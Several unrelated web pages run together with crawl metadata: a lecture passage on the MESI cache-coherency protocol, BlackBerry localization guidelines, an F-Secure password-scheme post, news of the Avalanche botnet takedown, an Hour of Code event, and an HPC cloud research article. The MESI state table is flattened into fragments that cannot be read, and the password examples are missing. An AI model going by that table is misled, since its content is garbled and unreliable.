dirty line from its cache in order to free up a cache line for a newly requested block. Bus Read Another processor issues a read request to the shared primary memory for a block that is held in this processors individual cache. This processor’s snoop cache detects the request. Bus Write Another processor issues a write request to the shared primary memory for a block that is held in this processors individual cache. Upgrade Another processor signals that a write to a cache line that is shared with this processor. The other processor will upgrade the status of the cache line from “Shared” to “Modified”. FSM: Action and Here is a tabular representation of the Finite State Machine for the MESI protocol. Depending on its Present State (PS), an individual processor responds to events. BU – Bus Yes: NS = S No: NS = E NS = M NS = I NS = I NS = I NS = I NS = M NS = I NS = S NS = I Should not occur. Write data back. NS = I. Write data back NS = S Write data back NS = I Should not occur. Here is an example from the text by Andrew Tanenbaum (Ref. 4). This describes three individual processors, each with a private cache, attached to a shared primary memory. When the multiprocessor is turned on, all cache lines are marked invalid. We begin with CPU reading block A from the shared memory. CPU 1 is the first (and only) processor to request block A from the shared memory. It issues a BR (Bus Read) for the block and gets its copy. The cache line containing block A is marked Exclusive. Subsequent reads to this block access the cached entry and not the shared memory. Neither CPU 2 nor CPU 3 respond to the MESI Illustrated (Step 2) We now assume that CPU 2 requests the same block. The snoop cache on CPU 1 notes the request and CPU 1 broadcasts “Shared”, announcing that it has a copy of the block. Both copies of the block are marked as shared. This indicates that the block is in two or more caches for reading and that the copy in the shared primary memory is up to date. CPU 3 does not respond to the MESI Illustrated (Step 3) At this point, either CPU 1 or CPU 2 can issue a local write, as that step is valid for either the Shared or Exclusive state. Both are in the Shared state. Suppose that CPU 2 writes to the cache line it is holding in its cache. It issues a BU (Bus Upgrade) broadcast, marks the cache line as Modified, and writes the data to the line. CPU 1 responds to the BU by marking the copy in its cache line as Invalid. CPU 3 does not respond to the BU. Informally, CPU 2 can be said to “own the cache line”. MESI Illustrated (Step 4) Now suppose that CPU 3 attempts to read block A from primary memory. For CPU 1, the cache line holding that block has been marked as Invalid. CPU 1 does not respond to the BR (Bus Read) request. CPU 2 has the cache line marked as Modified. It asserts the signal “Dirty” on the bus, writes the data in the cache line back to the shared memory, and marks the line “Shared”. Informally, CPU 2 asks CPU 3 to wait while it writes back the contents of its modified cache line to the shared primary memory. CPU 3 waits and then gets a correct copy. The cache line in each of CPU 2 and CPU 3 is marked as Shared. Tanenbaum’s actual example continues for a few more steps, but this sample is enough to illustrate the MESI process. We have considered cache memories in parallel computers, both multiprocessors and multicomputers. Each of these architectures comprises a number of individual processors with private caches and possibly private memories. We have noted that the assignment of a private cache to each of the individual processors in such architecture is necessary if we are to get acceptable performance. We have noted that the major issue to consider in these designs is that of cache coherency. Logically speaking, each of the individual processors must function as if it were accessing the one and only copy of the memory block, which resides in the shared primary memory. We have proposed a modern solution, called MESI, which is a protocol in the class called “Cache Invalidate”. This shows reasonable efficiency in the maintenance of coherency. The only other class of protocols falls under the name “Central Database”. In this, the shared primary memory maintains a list of “which processor has which block”. This centralized management of coherency has been shown to place an unacceptably high processing load on the shared primary memory. For this reason, it is no longer used. In this lecture, material from one or more of the following references has been used. 1. Computer Organization and Design, David A. Patterson & John L. Hennessy, Morgan Kaufmann, (3rd Edition, Revised Printing) 2007, (The course textbook) ISBN 978 – 0 – 12 – 370606 – 5. 2. Computer Architecture: A Quantitative Approach, John L. Hennessy and David A. Patterson, Morgan Kauffman, 1990. There is a later edition. ISBN 1 – 55860 – 069 – 8. 3. High–Performance Computer Architecture, Harold S. Stone, Addison–Wesley (Third Edition), 1993. ISBN 0 – 201 – 52688 – 3. 4. Structured Computer Organization, Andrew S. Tanenbaum, Pearson/Prentice–Hall (Fifth Edition), 2006. ISBN 0 – 13 – 148521 – 0 5. Modern Processor Design: Fundamentals of John Paul Shen and Mikko H. Lipasti, McGraw Hill, 2005. ISBN 0 – 07 – 057064 – 7.
<urn:uuid:6e116d19-727b-4bc4-ac4e-225d78e73f69>
CC-MAIN-2017-04
http://edwardbosworth.com/My5155_Slides/Chapter13/CacheCoherency.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00059-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914828
4,325
3.34375
3
Localization is the process of adapting software to meet the requirements of local markets and different languages. Internationalization is the process of designing an application so that it can be adapted to various languages and regions without engineering changes. Localized applications should reflect correct cultural and linguistic conventions that the target market uses. Localization and internationalization make it possible for you to create a localized version of your software. BlackBerry devices are sold all over the world and BlackBerry device applications are translated into over 30 languages, including languages that are not based on a Latin alphabet. Some BlackBerry devices also feature a localized keyboard. Early in the design process, consider whether your application might require localization. If your application does not require localization now, consider designing your application so that it would be easy to localize it in the future. Be aware that even if your application might not be localized, some users might want to type text in other languages in your application. Best practice: Designing applications for different languages and regions Guidelines for layout Leave enough space in your UI for translated text. The height and the width of text might expand when translated from English to other languages. For labels and other short text strings, prepare for up to 200% expansion. For lengthy text (more than 70 characters), prepare for up to 40% expansion. Where possible, place labels above the associated field. Leave blank space at the end of each - Try to avoid displaying truncated text. The meaning might be unclear to users if the most important text does not appear. First, try to reduce the size of the text. If you reduce the size but you cannot read the text easily, try wrapping the text onto two lines instead. If you cannot wrap the text, consider using an abbreviation. Otherwise, use an ellipsis (...) to indicate that the text is truncated and provide a tooltip. - Consider the font size for languages that use diacritics. Languages that use diacritics, such as Thai, require more vertical space. The diacritics are smaller than characters and might not appear clearly if the font size is small. Thai has stackable diacritics that might increase the vertical spread of a string and exceed the pixel height of the font size. languages that are displayed from right to left, make sure that the UI is a mirror image of the English UI. For example, in Hebrew, the label for a drop-down list is displayed to the right of the list and the drop-down arrow is displayed to the left of the list. Make sure that UI components align along the appropriate side of the screen based on the direction of the language. For example, in English, a leading component aligns along the left side of the screen. In Arabic, a leading component aligns along the right side of the - Provide options for the direction that text appears in. In some languages, such as Arabic and Hebrew, text is displayed from right to left but numbers and words in other languages are displayed from left to right. For example, users might type most words in Arabic (this text needs to appear from right to left) but they type passwords in English (this text needs to appear from left to right). - Make arrangements for displaying the position of a contact's title, full name, and address on a per-language basis. These items display in a different order, depending on the language (for example, title, first name, last name, or last name, first name, title). In some countries, the zip/postal code can appear before the name of the city and contain letters as well as numbers. - If users have the option to change display languages, display the name of the language in that language. For example, display "Italiano" instead of "Italian." - Test translated UI to verify the layout of the UI. - During testing, type a pangram in the target language. A pangram is a sentence that uses each character in the alphabet. Pangrams are useful because they include diacritics that can appear above, below, or beside a character. Guidelines for color and graphics - Be aware that colors, graphics, and symbols can have different meanings in different cultures. If you are designing an application for a specific market, carefully consider the cultural implications of your design choices. - Avoid text and numbers in icons and images because they require localization. - If you include graphics in your application, make sure that the graphics are localized. For example, in Arabic, question mark icons are mirror images of question mark icons used in English. - Include tooltips for all icons. Even within one culture, some icons might not be recognized by everyone. - Avoid using national flags to identify languages, user IDs, or countries. Use text instead. Best practice: Coding for different languages and regions - Store text strings in separate resource files and and use unique identifiers (string IDs) for each text string. - Avoid concatenating partial strings to form a sentence. When translated, the strings might not produce a logical sentence. Create a new string for the sentence instead. - Avoid using variables in place of nouns (for example, "The <X> is locked."). Instead, create a specific string for each noun (for example "The screen is locked." and "The keypad is locked."). Even if the sentence appears correctly in English, in some languages, if a noun is singular or plural and masculine or feminine, the rest of the string might need to change. Only use variables for strings that can only be known at runtime (for example, file names). - Avoid making part of a sentence into a link. When translated, the words in the link might appear in a grammatically incorrect order. For example, use "For more information, click the following link: <link>" instead of "Click on <link> for more information." - Avoid using a common string if the context of usage differs. Depending on the context, a word could require different translations. For example, the word "new" might require a different translation depending on the gender of the noun. - Avoid hard-coding spaces, punctuation marks, and words. Include these items in translatable strings instead. This approach allows translators to make changes according to the rules for each language. - Avoid hard-coding strings of any kind, including weekdays and weekends. Verify that the start of the week matches the convention for each locale. Guidelines for numbers - Make arrangements for singular and plural nouns on a per-language basis. Nouns in some languages can have one form for both singular and plural, one form for singular and another form for plural (for example, "1 day" and "2 days"), or multiple forms, depending on the number of items (for example, one item, two items, a few items, and many items). - Avoid hard-coding number separators. For example, 1,234.56 appears in United States English but 1 234,56 appears in French. - Avoid hard-coding the number of digits between separators. For example, 123,456,789.00 appears in the United States but 12,34,56,789.00 appears in India. - Avoid hard-coding the display of negative numbers. For example, negative numbers can appear as -123, 123-, (123), or . - Provide options for currencies. For example, currencies can appear as $12.34, 12,34€, or 12€34. In addition, some currency symbols require more space. - Verify that numbers, measurements, dates, and time formats reflect the locale of your users. Best practice: Writing for different languages and regions - Include subjects where possible. For example, use "the list that appears when you type" instead of "the list that appears when typing." - Include articles where possible. For example, use "press the Escape key" instead of "press Escape." - Use relative pronouns where possible. For example, use "the email address that you use" instead of "the email address you use." - Use terms consistently throughout the UI and try to use terms that are consistent with other applications on the BlackBerry device. Using consistent terms improves the accuracy of the translations. - Avoid using slang, idioms, jargon, colloquialisms, and metaphors in your UI . These terms can be difficult for translators to translate and for users to understand. - Avoid references to ethnicity, religion, culture, and gender. - For references to countries, use the political name of each country. For example, use "People's Republic of China" instead of "Mainland China." - Verify that translated text uses local language conventions where possible.
<urn:uuid:082bf67f-5b35-4db2-95ea-dca442da74ae>
CC-MAIN-2017-04
https://developer.blackberry.com/design/bb7/localization_2_0_514469_11.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00297-ip-10-171-10-70.ec2.internal.warc.gz
en
0.862863
1,824
3.140625
3
I am one those people that have a very short attention span for technical instructions, so let me try to explain this as shortly and clearly as possible. Just in case you are like me. 🙂 The idea is to use a system that allows you to do 2 things: 1. Remember your passwords through writing a part of it down. The only thing you need to remember is a part that is the same for all your passwords; a pin if you will. 2. Create passwords that are good and strong, unique and can’t be guessed Here are the step-by-step instructions: 1. Think of a “pin” for your password, this is the part that is same for all of your passwords. The pin should be 3 characters or longer, it could be something like “25!” and this part should be kept secret. 2. For each of the web sites that you need a password for, you create a code that helps you remember what site/service the password is for. For example aMa for Amazon and gMa for gmail. 3. Continue the password with a random set of 4 or more characters, for example: 2299 or xy76. You should use different random characters for your different passwords. 4. Write down parts 1 & 2 on a note and keep is safe so you don’t forget it. In this example you would end up with a note in your wallet with this written down: 5. When using the passwords, add your pin to them. Remember again that the pin should not be written down anywhere! You can decide the location of your pin too. With the example pin “25!” created in the first step we would end up with 2 passwords that could be: Tadaa, you now have passwords that are unique and can’t be guessed! And of course you only need to remember a part of it! By having unique passwords you can also make sure that even if someone finds out one of your passwords, the others are still safe. As a final note, should you choose to use this system, you should come up with your own passwords and not use the ones used in this post or in our Lab’s post. Hopefully I managed to make it sound relatively easy. If not drop me a question below. A multinational law enforcement operation gave internet users a big gift just in time for the holiday season! In late November, Europol, the FBI, and several other organizations around the world worked together to takedown Avalanche – an international crime network behind cyber attacks that some estimates say have caused hundreds of millions of dollars in damages since 2009. The network allowed criminals to conduct malware and money laundering campaigns throughout the globe. By providing criminals with hosting services and other infrastructure, Avalanche helped attackers send over one million malicious emails each week in order to spread malware to individuals and companies. Exact numbers for the extent of damage Avalanche inflicted on victims are unavailable. But according to Europol, Avalanche helped criminals cause over 6 million euros in damage to financial institutions in Germany alone. The takedown resulted in seized servers, searched premises, and even a few arrests. F-Secure Labs helped support the multinational effort by sharing their malware analysis expertise with law enforcement officials. “The analysts on our Threat Intelligence team often provide law enforcement with technical assistance for their investigations. When asked to participate, we reviewed thousands of samples seized from Avalanche to validate law enforcement's analysis,” says F-Secure Security Advisor Sean Sullivan. “Matching the seized samples with what we have in our malware database helped law enforcement verify that those files were not only harmful, but that the industry was detecting them and able to help victims.” Avalanche hosted what the US Justice Department described as over “two dozen of the world’s most pernicious types of malicious software”. Some of the more notorious malware families hosted by Avalanche included the Dridex and GameOver Zeus banking trojans. Anyone that thinks they could be infected by these or other types of malware can use F-Secure’s free Online Scanner to help them clean their PCs of many different types of malware infections. And since most malware (besides ransomware) runs silently alongside your regular programs, running something like Online Scanner is necessary if you’re not already using a reliable AV program. ”Collaboration between the industry and law enforcement is the only realistic way to fight cyber crime,” adds Sean. “And even though this is good, it’s not like we’ve defeated online crime. Cyber crime services are a big industry, and the criminals using Avalanche will probably spend Christmas shopping for new tools to use in 2017.” [ Image by Pierre Honeyman| Flickr ] Studies have shown time and time again that computer science skills are invaluable tools to have in today’s world. And last week at F-Secure headquarters in Helsinki, F-Secure fellow Maaret Pyhäjärvi invited her colleagues’ kids to come to the office to take part in the Hour of Code. The Hour of Code is an initiative from Code.org designed to introduce kids to the wonderful world of coding. And while coding has a stereotypical reputation of being difficult, labor intensive work, Maaret (winner of this year’s Most Influential Agile Testing Professional Person award) feels that this reputation ignores how the right knowledge and skills can empower kids to take full advantage of the benefits technology offers. “I teach kids, because in a world full of computers, we want our kids to grow up knowing how to be creators, not just consumers,” Maaret told me. “I started teaching when I realized that while this stuff is ‘cool’ for the boys, the girls are still often not interested. They have too few models of doing this, and people sometimes portray this job that I love as something it isn’t: asocial and boring.” The Hour of Code is designed to teach anyone holding the preconceptions pointed out by Maaret a lesson about how coding can be fun and engaging. And I mean that literally. Code.org provides anyone interested in throwing their own Hour of Code event with all the support they need to create a fun, engaging lesson for kids up to grade 9 (they also have a page with extra learning resources for kids to continue their computer science education). It even has lesson plans to use with groups of people that have limited internet access or no actual computers. At F-Secure, the kids overwhelmingly voted for a Minecraft-themed exercise when Maaret gave them a choice between that and an activity based on the latest Disney feature (both available on the Hour of Code website). The coding exercise was followed by some drawing, and then a pizza and pop party. It was a great way to spend a morning. It’s also a great way to encourage kids to begin learning about computers responsibly at a young age. Anything that can be said here about the importance of computer know-how in today’s economy would be superfluous. But not many people realize that there's a discrepancy between the kind of computer skills being taught in schools and the kind of computer skills needed by employers. According a recent Washington Post article, only one-quarter of schools in the US teach computer science courses, even though there are currently half a million unfilled jobs that require a computer science education. And while today’s kids are hardly going to fill that gap anytime soon, they do need to start learning the fundamentals needed to develop more advanced computer science skills. For example, a free MOOC called Cyber Security Base with F-Secure recently organized by F-Secure and the University of Helsinki requires some basic knowledge of coding in order to participate. So even though Computer Science Education Week is over, you shouldn’t let this discourage you from giving kids the support they need to get into programming. Check out this website for more information on setting up your own Hour of Code. And here are resources you can use to learn more about coding, programming, scripting, and more (although they’re more advanced than the Hour of Code). Tutorials and Courses via the World Wide Web Consortium Introduction to Computer Science and Programming from MIT OpenCourseWare Code Racer – A video game designed to teach coding (these are development instructions as the actual game is no longer on the web)
<urn:uuid:4d717ec3-7f69-4ea8-92cd-bcafb0911e4a>
CC-MAIN-2017-04
https://safeandsavvy.f-secure.com/2010/03/15/how-to-create-and-remember-strong-passwords/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00169-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949108
1,725
2.8125
3
Researchers at North Carolina State University working in partnership with the Argonne Leadership Computing Facility (ALCF) have successfully demonstrated a proof-of-concept for a novel high-performance cloud computing platform by merging a cloud computing environment with a supercomputer. Project leads Patrick Dreher and Mladen Vouk discuss the evolution of the project on the ALCF website. Cloud computing environment embedded inside ALFC Blue Gene/P “Surveyor” The proof-of-concept implementations show that a fully functioning production cloud computing environment can be completely embedded within a supercomputer, thereby enabling the cloud’s users to benefit from the underlying HPC hardware infrastructure. The work was part of the ALCF’s Director’s Discretionary (DD) program, which provided the research team with access to a Blue Gene/P machine to explore the feasibility of situating a distributed cloud computing architecture within a supercomputer. Dreher and Vouk describe how this project is different from most other HPC cloud efforts. “The ‘traditional’ cloud design approach often starts with a relatively loosely coupled X86-based architecture,” they write. “Then, if there is an interest in HPC, a cloud computing service can be added and adapted to HPC computational needs and requirements. More often than not, such a service is based on virtual machines and is used by distributed applications that are not sensitive to the latency requirements for HPC applications.” This research project employed an HPC-first approach: using a supercomputer to host a cloud, ensuring that the native HPC functions were present. The supercomputer’s hardware provided the foundation for a software-defined system capable of supporting a cloud computing environment. The authors state that this “novel methodology has the potential to be applied toward complex mixed-load workflow implementations, data-flow oriented workloads, as well as experimentation with new schedulers and operating systems within an HPC environment.” The project used the ALCF’s IBM Blue Gene/P supercomputer, Surveyor, a non-production, test and development platform with 1,024 quad-core nodes (4,096 processors) and 2 terabytes of memory, with a peak performance of 13.9 teraflops. A software utility package called Kittyhawk, originally developed with funding from IBM Research, proved to be indispensable. This open source tool serves as a provisioning engine and also offers basic low-level computing services within a Blue Gene/P system. The software is what enabled the team to construct an embedded elastic cloud computing infrastructure within the supercomputer. For the cloud functionality, the team went with the Virtual Computing Laboratory (VCL) cloud computing software system, originally designed and developed at NC State University. This open source cloud computing and resource management system covers the full-range of cloud capabilities, including Hardware as a Service (HaaS), Infrastructure as a Service (IaaS), Platform as a Service (PaaS), Software as a Service (SaaS), as well as Everything as a Service (XaaS) options. It also includes a graphical user interface, an application programming interface, authentication plug-in mechanisms, on-demand resource management and scheduling, bare-machine and virtualized machine provisioning, provenance engine, a sophisticated role-based resource access, and license and scheduling options. The HPC-first design approach to cloud computing leverages the “localized homogeneous and uniform HPC supercomputer architecture usually not found in generic cloud computing clusters,” according to the project leads. Such a system has the potential to support multiple workloads, from traditional HPC simulation jobs to workflows that involve both HPC and non-HPC analytics to data-flow orientation work. The implementation should be compatible on any supercomputers that have the Kittyhawk utility installed, and the next step is to scale the proof-of-concept to other systems.
<urn:uuid:bdbb792b-3ab0-4d1e-ade8-689ec0d76cf6>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/01/29/researchers-implement-hpc-first-cloud-approach/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00077-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922599
819
2.703125
3